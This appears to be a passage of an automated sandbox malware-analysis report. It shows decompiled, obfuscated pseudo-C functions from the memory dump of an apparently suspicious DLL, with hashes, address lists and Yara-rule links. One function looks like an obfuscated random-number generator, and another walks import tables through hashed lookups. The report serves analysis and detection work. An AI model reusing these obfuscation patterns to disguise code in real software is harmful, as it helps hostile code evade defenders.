										_t569 =  ==  ? (_v20 << 0x00000020 | _t595) >> _t376 : _v20 >> _t376;
										goto L37;
										L49:
										__eflags = _t570 - _v44;
										if(_t570 <= _v44) {
											_t387 = E10001460(__eflags, _t570 - E10009D50(0x1f4aa581), _v116);
											__eflags = _v88 - _t570;
											E10013580(_v28[2] + _t387 * 4 - 0x13056b4c, 0, 0x1157b474 + (_v88 - _t570) * 4);
											_t635 = _t635 + 0x18;
										}
										_t510 = _a4;
										_t532 = _v84;
										__eflags = _t595;
										_t461 = _v28;
										 *( *((intOrPtr*)(_t510 + 8)) + _t532 * 4 - 4) = _t595;
										_t590 = _v32;
										if(_t595 != 0) {
											 *_t510 = _t590;
										}
										_t383 = E10009D50(0xf239476a);
										_t606 = _t635 + 4;
										_t347 = _v120 - _t383 + 0x964d47c7;
										__eflags = _t347 - _v104;
									} while (__eflags != 0);
									goto L53;
								}
							}
						}
						_t484 = _a12;
						_t527 = _a4;
						_t582 =  *_t484;
						__eflags =  *(_t527 + 4) - _t582;
						if( *(_t527 + 4) < _t582) {
							 *(_t527 + 4) = _t582;
							__eflags = _t582 << E10009D50(0x647400ae);
							_t450 = E10003F90( *((intOrPtr*)(_a4 + 8)), _t582 << E10009D50(0x647400ae));
							_t527 = _a4;
							_t602 = _t602 + 0xc;
							 *((intOrPtr*)(_t527 + 8)) = _t450;
							_t582 =  *_t484;
						}
						__eflags = _t582;
						if(_t582 <= 0) {
							__eflags = 0;
							goto L22;
						} else {
							_t486 = 0;
							_t599 = 0;
							__eflags = 0;
							_v48 = _t484[2];
							_v36 =  *((intOrPtr*)(_t527 + 8));
							_v32 =  *((intOrPtr*)(_a16 + 8));
							0;
							0;
							do {
								_v20 = _t486;
								_v24 =  *((intOrPtr*)(_v48 + _t582 * 4 - 4));
								 *((intOrPtr*)(_v36 + _t582 * 4 - 4)) = E10013860( *((intOrPtr*)(_v48 + _t582 * 4 - 4)), _t599,  *_v32, 0);
								_t444 = E10005920(_v36, _t443, 0);
								_t602 = _t602 + 8;
								__eflags = _t444 & 0x00000001;
								_t445 = _v20;
								_t487 =  !=  ? _t582 : _t486;
								__eflags = _t445;
								_t486 =  !=  ? _t445 :  !=  ? _t582 : _t486;
								_t599 = E10012E20(_v24, _t599,  *_v32, 0);
								_t582 = _t582 - 1;
								__eflags = _t582;
							} while (_t582 > 0);
							L22:
							_t549 = _v64;
							E1001E610(_a8, 0);
							_t584 = _v52;
							 *_a4 = 0;
							L5:
							_t463 = _v28;
							goto L6;
						}
					}
					 *_a4 = 0;
					E1001E610(_a8, 0);
					L4:
					goto L5;
				}
				 *_a4 = 0;
				E10007D70(_t455, _a8);
				goto L4;
			}

0x1001da70
0x1001da79
0x1001da81
0x1001da88
0x1001da90
0x1001da97
0x1001da9f
0x1001daa7
0x1001daae
0x1001dab3
0x1001dab8
0x1001dacf
0x1001dad4
0x1001dad7
0x1001dad9
0x1001db38
0x1001db3b
0x1001db3e
0x1001db40
0x1001db43
0x1001dc09
0x1001dc20
0x1001dc22
0x1001dc25
0x1001dc28
0x1001dc2e
0x1001dc36
0x1001dc3b
0x1001dc40
0x1001dc46
0x1001dc48
0x1001dc4a
0x1001dc4d
0x1001dc4f
0x1001dc5d
0x1001dc62
0x1001dc65
0x1001dc65
0x1001dc68
0x1001dc6f
0x1001dc7b
0x1001dc80
0x1001dc83
0x1001dc85
0x1001dc88
0x1001dc8b
0x1001dc90
0x1001dd44
0x1001dd4b
0x00000000
0x1001dc96
0x1001dc96
0x1001dc96
0x1001dc98
0x1001dca0
0x1001dca6
0x1001dca9
0x1001dcb2
0x1001dcd1
0x1001dce0
0x1001dcef
0x1001dcf2
0x1001dcf7
0x1001dcfa
0x1001dcfd
0x1001dcfd
0x1001dd03
0x1001dd05
0x1001dd52
0x1001dd55
0x1001dd55
0x1001dd57
0x1001dd07
0x1001dd0c
0x1001dd15
0x1001dd19
0x1001dd1e
0x1001dd1e
0x1001dd5e
0x1001dd61
0x1001dd63
0x1001dd65
0x1001dd67
0x1001dd6a
0x1001dd6d
0x1001dd6f
0x1001dd72
0x1001dd74
0x1001dd77
0x1001dd7e
0x1001dd83
0x1001dd86
0x1001dd86
0x1001dd8f
0x1001dd8f
0x1001dd99
0x1001dd9c
0x1001dd9f
0x1001dda1
0x1001e285
0x1001e288
0x1001e290
0x1001e295
0x1001e297
0x1001e29b
0x1001e29e
0x1001e2a0
0x1001e2a2
0x1001e2a4
0x1001e300
0x1001e302
0x1001e302
0x1001e305
0x1001e307
0x1001e30d
0x1001e315
0x1001e318
0x1001daf4
0x1001daf4
0x1001daf5
0x1001dafd
0x1001db00
0x1001db08
0x1001db0b
0x1001db13
0x1001db14
0x1001db1c
0x1001db1d
0x1001db25
0x1001db34
0x1001db34
0x1001e2a9
0x1001e2ab
0x1001e2ae
0x1001e2ae
0x1001e2b0
0x1001e2b0
0x1001e2b7
0x1001e2c2
0x1001e2c9
0x1001e2cd
0x1001e2d3
0x1001e2d6
0x1001e2d8
0x1001e2e2
0x1001e2e6
0x1001e2f0
0x1001e2f5
0x1001e2f8
0x1001e2fb
0x1001e2fb
0x1001e2fb
0x00000000
0x1001dda7
0x1001dda9
0x1001ddb5
0x1001ddbb
0x1001ddc5
0x1001ddd3
0x1001dde6
0x1001ddeb
0x1001de04
0x1001de0b
0x1001de28
0x1001de35
0x1001de3a
0x1001de45
0x1001de54
0x1001de57
0x1001de59
0x1001de5c
0x1001de5f
0x1001de92
0x1001de95
0x1001de9d
0x1001dea3
0x1001deae
0x1001deb1
0x1001dec9
0x1001decf
0x1001ded3
0x1001def7
0x1001df06
0x1001df0c
0x1001df0f
0x1001df17
0x1001df1c
0x1001df1f
0x1001df21
0x1001df24
0x1001df2c
0x1001df2f
0x1001df37
0x1001df3d
0x1001df42
0x1001df4a
0x1001df54
0x1001df72
0x1001df7a
0x1001df7c
0x1001df83
0x1001df89
0x1001df91
0x1001df96
0x1001df99
0x1001df9c
0x1001dfa6
0x1001dfa9
0x1001dfb0
0x1001dfb5
0x1001dfb9
0x1001dfbd
0x1001dfcc
0x1001dfe1
0x1001dfe3
0x1001dfee
0x1001dff0
0x1001dff3
0x1001dff6
0x1001dffe
0x1001e008
0x1001e00d
0x1001e010
0x1001e012
0x1001e015
0x00000000
0x00000000
0x1001e021
0x1001e031
0x1001e035
0x1001e037
0x1001e03d
0x1001e049
0x1001e04e
0x1001e054
0x1001e056
0x1001e058
0x1001e058
0x1001e05b
0x1001e05f
0x00000000
0x00000000
0x1001e084
0x1001e084
0x1001e087
0x1001e08a
0x1001e092
0x1001e095
0x1001e098
0x1001e09a
0x1001e09d
0x1001e0a6
0x1001e0ab
0x1001e0ae
0x1001e0b1
0x1001e0b4
0x1001e0b9
0x1001e0c2
0x1001e0c7
0x1001e0ca
0x1001e0cd
0x1001e0cd
0x1001e0d0
0x1001e0d2
0x1001e0d8
0x1001e170
0x1001e173
0x1001e177
0x1001e17c
0x1001e17f
0x1001e181
0x1001e187
0x1001e194
0x1001e199
0x1001e19c
0x1001e19c
0x1001e1a7
0x1001e1ac
0x1001e1af
0x1001e1b1
0x1001e1b3
0x1001e1bd
0x1001e1bf
0x1001e1c5
0x1001e1c8
0x1001e1d1
0x1001e1da
0x1001e1de
0x1001e1e0
0x1001e1e6
0x1001e1ec
0x1001e1fd
0x1001e202
0x1001e20e
0x1001e211
0x1001e216
0x1001e218
0x1001e218
0x1001e1e0
0x00000000
0x1001e0de
0x1001e0e1
0x1001e0e6
0x1001e0ef
0x1001e133
0x1001e136
0x1001e13e
0x1001e141
0x1001e143
0x1001e146
0x1001e14b
0x1001e150
0x1001e15b
0x1001e15d
0x1001e15d
0x1001e106
0x1001e115
0x1001e124
0x1001e129
0x1001e12c
0x1001e12f
0x1001e12f
0x00000000
0x1001e133
0x1001e0d8
0x1001e070
0x1001e07f
0x1001e081
0x00000000
0x1001e21c
0x1001e21c
0x1001e21f
0x1001e23c
0x1001e24e
0x1001e25b
0x1001e260
0x1001e260
0x1001e263
0x1001e266
0x1001e269
0x1001e26b
0x1001e271
0x1001e275
0x1001e278
0x1001e27e
0x1001e27e
0x1001de75
0x1001de7a
0x1001de84
0x1001de89
0x1001de89
0x00000000
0x1001de92
0x1001dda1
0x1001dc90
0x1001db49
0x1001db4c
0x1001db4f
0x1001db51
0x1001db54
0x1001db56
0x1001db68
0x1001db71
0x1001db76
0x1001db79
0x1001db7c
0x1001db7f
0x1001db7f
0x1001db81
0x1001db83
0x1001dd25
0x00000000
0x1001db89
0x1001db8f
0x1001db91
0x1001db91
0x1001db93
0x1001db99
0x1001db9f
0x1001dba8
0x1001dbac
0x1001dbb0
0x1001dbb3
0x1001dbba
0x1001dbce
0x1001dbd5
0x1001dbda
0x1001dbdd
0x1001dbdf
0x1001dbe2
0x1001dbe5
0x1001dbe7
0x1001dbfa
0x1001dbfc
0x1001dbfc
0x1001dbfc
0x1001dd27
0x1001dd27
0x1001dd2f
0x1001dd3a
0x1001dd3d
0x1001daf1
0x1001daf1
0x00000000
0x1001daf1
0x1001db83
0x1001dade
0x1001dae9
0x1001daee
0x00000000
0x1001daee
0x1001dabd
0x1001dac7
0x00000000

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5253e5bfce7cf78914c93ddfa680de11061eaa6f58eaf03cb0f58b4fe16015
Instruction ID: 9f12f457afdb97748778f3faf7bdeb0b3ff202ce2e9d5b003d8fe497839e8514
Opcode Fuzzy Hash: 7a5253e5bfce7cf78914c93ddfa680de11061eaa6f58eaf03cb0f58b4fe16015
Instruction Fuzzy Hash: 6742A2B9E002099FDB00DFA4DC81AAEBBF5EF49354F154129F814AB352E731AD51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10015BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10015BF0(void* __eflags) {
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				void* _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t57;
				void* _t60;
				unsigned int _t64;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t86;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				void* _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t111;
				signed int _t120;
				signed int _t121;
				signed int _t128;
				signed int _t131;
				signed int _t169;
				void* _t179;
				signed int _t183;
				signed int _t188;
				signed int _t194;
				void* _t195;
				void* _t196;
				signed int _t237;

				_t169 =  *0x10024194; // 0x1
				_t48 = E10009D50(0x647402c3);
				_t196 = _t195 + 4;
				_t234 = _t169 - _t48;
				if(_t169 > _t48) {
					_t179 = 0xfffffc74;
					0;
					do {
						_v24 = E100020A0(_t234,  *(_t179 + 0x10023b60), 0xffffffff);
						_t69 = E10009D50(0xe47400ac);
						_t71 = E100020A0(_t234, E10009D50(0x5c38c288), 0xffffffff);
						_t74 = E10003750(_t234,  !(E10002DC0(_t234, _v24,  !_t69)), _t71 | 0x384cc224);
						_t196 = _t196 + 0x28;
						 *(_t179 + 0x10023b60) =  *(0x10020434 + ( *(_t179 + 0x10023b64) & 0x00000001) * 4) ^  *(_t179 + 0x10024194) ^ ( *(_t179 + 0x10023b64) & 0x7ffffffe | _t74) >> 0x00000001;
						_t179 = _t179 + 4;
						_t235 = _t179;
					} while (_t179 != 0);
					_t75 = 0xe3;
					_t120 = 0xe3;
					0;
					do {
						_v24 = _t75;
						_v20 = 0x100237d4[_t75];
						_t77 = E10009D50(0xe47400ac);
						_t78 = E10002DC0(_t235, 0xe98fe736, 0x167018c9);
						_t121 = _t120 - E10009D50(0xdd67dd4);
						_v36 = _t121 + 0x69a27d79;
						_v20 =  *((intOrPtr*)(_t121 * 4 - 0x4973d248));
						_t81 = E100020A0(_t235, 0x7ffffffe, 0xffffffff);
						E10003750(_t235, _v20, 0x7ffffffe);
						_v28 =  !(_t78 & _v20 & _t77);
						_t86 = E10009D50(0x58908707);
						_v28 = E10002DC0(_t235, E100020A0(_t235,  !_t81 & _v20 & 0xc31b7854 | _t86 &  !( !_t81 & _v20), _t78 & _v20 & _t77 & 0xc31b7854 | E10009D50(0x58908707) & _v28),  !_t81 & _v20 & _t78 & _v20 & _t77);
						E10002DC0(_t235,  !_t81 & _v20, _t78 & _v20 & _t77);
						E10009D50(0x9b8bffb1);
						_v28 = _v28 >> 1;
						_t128 =  *(0x10023448 + _v24 * 4);
						_v32 = _t128;
						_t183 =  *(0x10020434 + (_v20 & 0x00000001) * 4);
						_v20 = _t183;
						_t97 = E100020A0(_t235, 0xc62da7e4, 0xffffffff);
						_t98 = E10003750(_t235, _v32, _t97);
						_t120 = _v36;
						_t188 = (_t98 |  !_t128 & 0xc62da7e4) ^ (_t97 & _v20 |  !_t183 & 0xc62da7e4);
						E100020A0(_t235, _v20, _v32);
						_t100 = _v28;
						E100020A0(_t235, _t188, _t100);
						0x100237d4[_v24] = _t188 ^ _t100;
						_t103 = E10009D50(0x647402c3);
						_t196 = _t196 + 0x68;
						_t236 = _t120 - _t103;
						_t75 = _t120;
					} while (_t120 != _t103);
					_t104 = E10003750(_t236,  *0x10024190, 0x80000000);
					_t131 =  *0x100237d4; // 0xb7c36893
					_t105 = E10009D50(0x1b8bff52);
					_v24 = _t131;
					_t106 = E100020A0(_t236, _t131, 0xffffffff);
					_t107 = E100020A0(_t236, 1, 0xffffffff);
					_t111 = E10003750(_t236,  !(_t107 | _t106), (E10009D50(0x72976c99) | 0x16e36c35) ^ 0xe91c93ca);
					E10003750(_t236, _v24, 1);
					_t196 = _t196 + 0x30;
					_t194 = (_t105 & _t131 | _t104) >> 0x00000001 ^  *0x10023e04 ^  *(0x10020434 + _t111 * 4);
					_t237 = _t194;
					 *0x10024194 = 0;
					 *0x10024190 = _t194;
				}
				_t49 =  *0x10024194; // 0x1
				_t150 = 0x100237d4[_t49];
				_t47 = _t49 + 1; // 0x2
				 *0x10024194 = _t47;
				_t50 = E100020A0(_t237, 0x100237d4[_t49], 0xffffffff);
				_t51 = E10009D50(0x209e1c2b);
				E100020A0(_t237, _t150 >> 0xb, _t150);
				_t57 = E100020A0(_t237, ((_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87) << 0x00000007 & 0x9d2c5680, (_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87);
				E10009D50(0x8bb200ac);
				_t60 = E10003750(_t237, E100020A0(_t237, _t57, 0xffffffff), 0x33945623);
				_t64 = E10002DC0(_t237, _t60, E10003750(_t237, _t57, 0xcc6ba9dc)) ^ _t57 << 0x0000000f & 0xefc60000 ^ 0x33945623;
				return E100020A0(_t237, _t64, 0xffffffff) & _t64 >> 0x00000012 |  !(_t64 >> 0x12) & _t64;
			}

0x10015bf9
0x10015c04
0x10015c09
0x10015c0c
0x10015c0e
0x10015c14
0x10015c1f
0x10015c20
0x10015c30
0x10015c38
0x10015c54
0x10015c74
0x10015c79
0x10015ca0
0x10015ca6
0x10015ca6
0x10015ca6
0x10015caf
0x10015cb4
0x10015cbc
0x10015cc0
0x10015cc0
0x10015cca
0x10015cd2
0x10015ce6
0x10015d02
0x10015d11
0x10015d14
0x10015d1e
0x10015d35
0x10015d45
0x10015d4d
0x10015d93
0x10015d98
0x10015da5
0x10015db0
0x10015db3
0x10015dc0
0x10015dc5
0x10015dcc
0x10015dde
0x10015df7
0x10015e03
0x10015e06
0x10015e0e
0x10015e16
0x10015e1f
0x10015e2a
0x10015e36
0x10015e3b
0x10015e3e
0x10015e40
0x10015e40
0x10015e53
0x10015e5b
0x10015e68
0x10015e72
0x10015e84
0x10015e92
0x10015eb9
0x10015ec8
0x10015ecd
0x10015ed0
0x10015ed0
0x10015ed7
0x10015ee1
0x10015ee1
0x10015ee7
0x10015eec
0x10015ef3
0x10015ef6
0x10015f04
0x10015f13
0x10015f31
0x10015f45
0x10015f59
0x10015f72
0x10015f9c
0x10015fc2

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b5b656fae5eaf46586374435531dcfd479946e8cda3ef0cfe61850eb4f48dce
Instruction ID: 16e8e8febf69d5336eec6bf5518e0f9d6dd43903b9a6f96fb0c72d1b749442df
Opcode Fuzzy Hash: 3b5b656fae5eaf46586374435531dcfd479946e8cda3ef0cfe61850eb4f48dce
Instruction Fuzzy Hash: 439159FBD106245BF700DB74AC4392E36A5DB55265B5A0230FC18B7397FA216D14C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 10003A30, Relevance: .1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10003A30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed char _t68;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed char _t88;
				signed int _t95;
				signed char _t96;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t109;
				signed char _t113;
				signed int _t114;
				signed int _t133;
				signed int _t145;
				signed int _t147;
				signed char _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;

				_t97 = _a12;
				_t68 = (((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) << 6) + ((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) * 2 + 0xd6;
				_t156 = _t68;
				_t69 = _t68 * _t97;
				_t145 = _a8;
				if((_t68 * _t97 >> 0x00000020 | _t68 ^ _t97) != 0) {
					_v32 = _t156;
					_t98 = _a4;
				} else {
					_t98 = _a4;
					_t95 = (_t69 + _t156 & 0x000000ff | _t98) & _a12;
					_t96 = _t95 - _t98;
					_v32 = _t96;
					_t69 = _t95;
					_v28 = _t96 + _t69;
				}
				_v20 = _t69;
				_t157 = _t69;
				_t72 = E10009C60(_t98, _t145, _t157, _t157 >> 0x1f);
				_v24 = 0;
				if((_t145 ^ _a16 | _t98 ^ _a12) != 0) {
					_t109 = _a12;
				} else {
					_t109 = _a12;
					if((_t72 & 0x00000001) != 0) {
						_t88 = _v20 * _v28;
						_t145 = (_t88 + _t109) * _t157;
						_v24 = (_t88 & 0x000000ff) + _t145;
					}
				}
				_t73 = _t109;
				_t74 = _t73 * _t98;
				_v28 = _t74;
				_t162 = _a16 * _t98 + _t109 * _a8 + (_t73 * _t98 >> 0x20);
				_t113 = _v24 + _t145;
				_v24 = _t113;
				_t100 = _t113 * _t74;
				_t76 = E10009D50(0x647420ac) & (_t145 ^ _t100);
				_t114 = _t76;
				_t101 = _t100 | _t114;
				_v20 = _t162;
				_t147 = _v28;
				_t163 = _t147;
				if((_t147 ^ _a12 | _t162 ^ _a16) == 0) {
					L10:
					_t101 = _t101 * _t114 + _v24;
					_t79 = _t163 * _v32;
					_t133 = _t79 * _t101 >> 0x20;
					_t76 = (_t79 * _t101 & 0x000000ff) * 0x00000045 | _t101;
					goto L11;
				} else {
					_t133 = _t163;
					if((_a8 ^ _v20 | _a4 ^ _t133) == 0) {
						L11:
						 *0x100220d8 = ((_t133 & _t133 + _t76 & 0x000000ff) + _t76) * _t101;
						return _t133;
					}
					_t163 = _t133;
					if((_v32 >> 0x0000001f ^ _a16 | _a12 ^ _v32) != 0) {
						_t133 = _t163;
						goto L11;
					}
					goto L10;
				}
			}

0x10003a39
0x10003a50
0x10003a5f
0x10003a61
0x10003a65
0x10003a68
0x10003a8b
0x10003a8e
0x10003a6a
0x10003a71
0x10003a76
0x10003a7b
0x10003a7d
0x10003a82
0x10003a86
0x10003a86
0x10003a91
0x10003a94
0x10003aa0
0x10003ab2
0x10003abb
0x10003ae0
0x10003abd
0x10003ac0
0x10003ac3
0x10003ac8
0x10003ad0
0x10003adb
0x10003adb
0x10003ac3
0x10003ae3
0x10003ae5
0x10003ae9
0x10003afa
0x10003aff
0x10003b01
0x10003b07
0x10003b19
0x10003b1b
0x10003b1e
0x10003b20
0x10003b28
0x10003b2b
0x10003b32
0x10003b5c
0x10003b63
0x10003b69
0x10003b6c
0x10003b77
0x00000000
0x10003b34
0x10003b34
0x10003b45
0x10003b79
0x10003b8c
0x10003b9d
0x10003b9d
0x10003b47
0x10003b5a
0x10003b9e
0x00000000
0x10003b9e
0x00000000
0x10003b5a

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090b9843954a774e48ea3e762b649cd972328549f1a159c1933708a862d804c8
Instruction ID: 20e58dfe4aebecff88261e8bd4a87ceb40279a022038bac62bf160e2eee544c1
Opcode Fuzzy Hash: 090b9843954a774e48ea3e762b649cd972328549f1a159c1933708a862d804c8
Instruction Fuzzy Hash: 9141A772F001294BAB08CE69CCD15FFB7EAEBD8250B15802AEC55E7355D674AD0687E0

Uniqueness

Uniqueness Score: -1.00%

Function 10009A60, Relevance: .1, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10009A60(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _t41;
				signed char _t42;
				signed int _t43;
				signed char _t45;
				signed int _t50;
				signed int _t54;
				signed int _t55;
				signed char _t59;
				signed int _t61;
				signed char _t66;
				signed int _t67;
				signed int _t68;
				signed char _t71;
				signed int _t78;
				signed char _t83;
				signed char _t85;
				signed int _t86;
				signed int _t94;
				signed int _t105;
				signed int _t116;

				_t105 = _a4;
				_t59 = (_t105 ^ 0x000000f5) - _t105;
				_t41 = E10007DD0(0xa4) & _t59;
				_t78 = _t41 * _t59 >> 0x20;
				_t42 = _t41 * _t59;
				_t68 = _t42;
				_t61 = _t42 & _t105;
				_t43 = _a8;
				asm("sbb eax, [ebp+0x14]");
				if(_t105 < _a12) {
					_t55 = _t68 + _t61;
					_t78 = _t55 * _t78 >> 0x20;
					_t68 = _t55 * _t78;
					_t43 = _t68;
					_v20 = _t43;
					_t61 = 0;
				}
				if((_t68 >> 0x0000001f ^ _a8 | _t68 ^ _t78) == 0) {
					_t94 = _a12;
				} else {
					_t94 = _a12;
					if((_t68 >> 0x0000001f ^ _a16 | _t68 ^ _t94) != 0) {
						_t54 = _v20;
						_t67 = _t61 & _t54 * _t94;
						_t43 = _t54 + _t67 + 0xe;
						_t68 = _t67;
					}
				}
				_v24 = 0;
				if((_a8 ^ _a16 | _a4 ^ _t94) != 0) {
					_v24 = 0x1cb;
				}
				_t83 = _t43 ^ _v20;
				_t45 = _t68 & _t83;
				_t66 = _t45 + 0xfffffefa;
				if((_t83 >> 0x0000001f ^ _a8 | _t83 ^ _a4) != 0 || (_t66 >> 0x0000001f ^ _a8 | _t66 ^ _a4) != 0) {
					_t71 = (_t68 ^ _t68 ^ _t66) + _t83;
					_t83 = _t71;
					_t68 = _t45 + (_t71 + _t66 & _t45) + (_t71 + _t66 & _t45);
				}
				_v20 = _t83;
				_t116 = _t83;
				if((_a16 ^ _t116 >> 0x0000001f | _a12 ^ _t116) == 0) {
					L14:
					_t50 = (_t68 ^ _v20) - _t66;
					_t85 = _v24;
					_t86 = _t50 * _t85 >> 0x20;
					_t68 = _t50 * _t85;
					goto L15;
				} else {
					asm("sbb eax, edi");
					if(_t116 >= _a4) {
						goto L14;
					}
					_t86 = _v24;
					L15:
					 *0x10022098 = _t68;
					return _t86;
				}
			}

0x10009a6c
0x10009a77
0x10009a88
0x10009a8a
0x10009a8a
0x10009a8c
0x10009a91
0x10009a96
0x10009a98
0x10009a9b
0x10009a9f
0x10009aa1
0x10009aa3
0x10009aa5
0x10009aa8
0x10009aab
0x10009aab
0x10009ac0
0x10009aeb
0x10009ac2
0x10009aca
0x10009ad4
0x10009ad6
0x10009ade
0x10009ae3
0x10009ae7
0x10009ae7
0x10009ad4
0x10009afb
0x10009b04
0x10009b06
0x10009b06
0x10009b0f
0x10009b14
0x10009b19
0x10009b2f
0x10009b46
0x10009b48
0x10009b52
0x10009b52
0x10009b57
0x10009b5a
0x10009b70
0x10009b7e
0x10009b83
0x10009b85
0x10009b88
0x10009b8a
0x00000000
0x10009b72
0x10009b75
0x10009b77
0x00000000
0x00000000
0x10009b79
0x10009b8c
0x10009b8f
0x10009b9d
0x10009b9d

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693367de0ca7e5250fbc7781139615303af4ca6adfb5745aadc6ef0a5ffc4a6a
Instruction ID: 68ba411bc14b652178cf8165412df6d474b026f2f64caf18af2ccd5cc9a49cb7
Opcode Fuzzy Hash: 693367de0ca7e5250fbc7781139615303af4ca6adfb5745aadc6ef0a5ffc4a6a
Instruction Fuzzy Hash: 0C418233B005294BAB10CEA998D11EFB7E6EFD8260B268525DC58BB345D634FD06CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 10018830, Relevance: .1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10018830(void* __ecx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t26;
				intOrPtr* _t28;
				void* _t34;
				void* _t42;
				signed short _t45;
				signed int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t57;
				intOrPtr* _t61;
				intOrPtr* _t62;
				void* _t63;
				signed short _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t73;
				intOrPtr* _t79;
				intOrPtr _t81;

				_t26 = E100100D0(_a8);
				_t68 = _t67 + 4;
				_t76 = _t26;
				_v32 = _t26;
				if(_t26 == 0) {
					L6:
					return 0;
				}
				_t48 = _a4;
				_t28 = E10019180(_t76, _a4);
				_t69 = _t68 + 4;
				_t61 = _t28;
				if(_t61 != 0) {
					if( *_t61 == 0) {
						goto L6;
					}
					_t62 = _t61 + 0x14;
					_t79 = _t62;
					while(1) {
						_t34 = E1000ACF0(E10001460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2, _t79, _a8, E10001460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2);
						_t69 = _t69 + 0x10;
						if(_t34 == 0) {
							break;
						}
						_t81 =  *_t62;
						_t62 = _t62 + 0x14;
						if(_t81 != 0) {
							continue;
						}
						goto L6;
					}
					_t51 =  ~(E10001460(__eflags, E100022E0(__eflags, 0,  *((intOrPtr*)(_t62 - 0x14))),  ~_t48));
					E10001460(__eflags,  *((intOrPtr*)(_t62 - 0x14)), _a4);
					_t73 = _t69 + 0x18;
					_t66 =  *_t51;
					_v28 = _t51;
					__eflags = _t66;
					if(_t66 == 0) {
						L12:
						return 1;
					}
					_t54 = _a4;
					_t63 = 0;
					_t55 = _t54 + 0xd8be785;
					__eflags = _t55;
					_v24 = _t55;
					_v20 =  *((intOrPtr*)(_t62 - 4)) + _t54;
					while(1) {
						E10003750(__eflags, _t66, 0xffff);
						_t42 = E10009D50(0x960018d7);
						__eflags = _t66;
						_t57 = _v24 + _t66;
						_t44 =  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2;
						_t45 = E10016B30(_t66, _v32,  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2);
						_t73 = _t73 + 0x14;
						__eflags = _t45;
						_t55 = (_t57 & 0xffffff00 | _t45 != 0x00000000) & _t55;
						__eflags = _t45;
						 *(_v20 + _t63) = _t45;
						if(_t45 == 0) {
							break;
						}
						_t66 =  *(_v28 + _t63 + 4);
						_t63 = _t63 + 4;
						__eflags = _t66;
						if(__eflags != 0) {
							continue;
						}
						goto L12;
					}
					return _t55;
				}
				return 1;
			}

0x1001883c
0x10018841
0x10018844
0x10018846
0x10018849
0x1001889c
0x00000000
0x1001889c
0x1001884b
0x1001884f
0x10018854
0x10018857
0x1001885d
0x10018862
0x00000000
0x00000000
0x10018864
0x10018864
0x10018870
0x10018888
0x1001888d
0x10018892
0x00000000
0x00000000
0x10018894
0x10018897
0x1001889a
0x00000000
0x00000000
0x00000000
0x1001889a
